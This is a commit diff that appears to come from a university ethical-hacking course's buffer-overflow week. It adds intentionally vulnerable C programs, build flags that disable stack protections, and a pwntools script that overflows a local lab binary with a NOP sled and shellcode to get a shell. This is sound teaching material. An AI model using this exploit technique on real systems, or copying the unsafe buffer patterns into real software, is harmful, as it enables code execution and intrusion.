Merge pull request #9 from CUEH/Overflows

Overflows

Week9_Overflows/Classic_Overflows/classic.c

@@ -0,0 +1,24 @@
+#include <stdio.h>
+#include <string.h>
+#include <unistd.h>
+
+int BUFFER=200;
+
+int copy(char* input){
+  char buffer[BUFFER];
+  strcpy(buffer, input);
+
+}
+
+int main(int argc, char* argv[]){
+    /* Main Function*/
+  char buf[400];
+  printf("Smash The Stack\n");
+  //Get the data
+  int r;
+  r = read(0, buf, 400);  //Save Version
+
+  int out = copy(buf);
+  printf("Lose :(\n");
+  return 0;
+}

Week9_Overflows/Classic_Overflows/genPayload.py

@@ -0,0 +1,61 @@
+from pwn import *
+
+#Update the Context with the Architecture and OS
+context.update(arch="i386", os="linux")
+
+#Create a Process Object to talk to. This should be our Target Binary
+p = process("./classic")
+
+# Do an initial read to get the welcome message
+data = p.read()
+print(data)  #For Debugging
+
+raw_input("Attach GDB and press enter")  #More debugging
+
+
+# And add our Shellcode
+
+#shellcode ="".join(["\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46",
+#                   "\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68",
+#                   "\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80"])
+
+#shellcode = "".join(["\x6a\x0b\x58\x99\x52\x66\x68\x2d\x70",
+#		     "\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61",
+#		     "\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52",
+#		     "\x51\x53\x89\xe1\xcd\x80"])
+shellcode = asm(shellcraft.sh())
+print(shellcraft.sh())
+
+
+# Offset to EIP (You need to calculate this)
+OFFSET = 236
+
+#Address we want to jump to (You need to supply this)
+#Pwntools will automatically convert to the correct endianness
+#TARGET_ADDRESS = p32(0xffffd080)
+TARGET_ADDRESS = p32(0x0804901d)
+#TARGET_ADDRESS = "BBBB"
+
+
+#Now we will build our payload
+
+PADD = 150
+payloadLen = OFFSET - len(shellcode) #How many 'A's to Pad with
+payloadLen = payloadLen - PADD #I like a bit of space below the shellcode too
+
+payload = "\x90"*payloadLen
+payload += shellcode  #Add Shellcode
+payload += "\x90"*PADD#30  #More Nops
+payload += TARGET_ADDRESS #Address to Jump to
+
+print("PAYLOAD {0} \n{1}".format(payload, len(payload)))
+p.writeline(payload)  #Write it to the Binary
+p.interactive() #Go into interactive mode.
+
+#34 is OK,  > 34 Crashses
+
+
+
+#Compile With
+#gcc -m32 -fno-stack-protector -z execstack -no-pie classic.c -o classic
+

Week9_Overflows/Intro/Makefile

@@ -0,0 +1,13 @@
+# Build the first overflow target
+
+CC = gcc
+CFLAGS = -m32 -g -z execstack
+
+
+firstOverflow: firstOverflow.c
+
+	$(CC) $(CFLAGS) firstOverflow.c -o firstOverflow
+
+
+all: firstOverflow
+

Week9_Overflows/Intro/firstOverflow.c

@@ -0,0 +1,43 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+
+int BUFFER=150;
+
+void win(void){
+    /*Win Condition
+      We Want to jump here
+    */
+    printf("\n ===== Win ===== \n\n");
+    system("/bin/sh");  //Tradition to get a shell
+}
+
+void lose(void){
+    /* Lose Condition */
+    printf("Current Memory Address is %p\n",lose);
+    printf("Aim for %p\n", win);    
+    printf("Lose :(\n");
+}
+
+int main(int argc, char* argv[]){
+    /* Main Function*/
+
+    //Pointer to the lose function
+    void (*fp)(void) = lose;
+
+    char buffer[BUFFER];
+    printf("Overflow the Buffer\n");
+
+    if (argc != 2){
+	printf("Overflow the buffer\n");
+	printf("Hint! Try `python -c \"print 'A'*100\"`\n");
+	return -1;
+    }
+
+    memcpy(buffer, argv[1], strlen(argv[1]));
+    printf("Off to %p\n",fp);
+    fp();
+
+    return 0;
+}

Week9_Overflows/Intro/stackFrames.c

@@ -0,0 +1,11 @@
+int add(int var1, int var2){
+  //Add two numbers
+  int total;
+  total = var1+var2;
+  return total;
+}
+
+void main(int argv, char* argc){
+  //Function call
+  int total = add(10, 20);
+}

Week9_Overflows/Intro/strOverflow.c

@@ -0,0 +1,9 @@
+#include <stdio.h>
+#include <string.h>
+
+void main(void){
+  char theString[15];
+  //Copy a String that is longer than the space allocated
+  strcpy(theString, "Hello World, This Is A Long String");
+  printf("%s", theString);
+}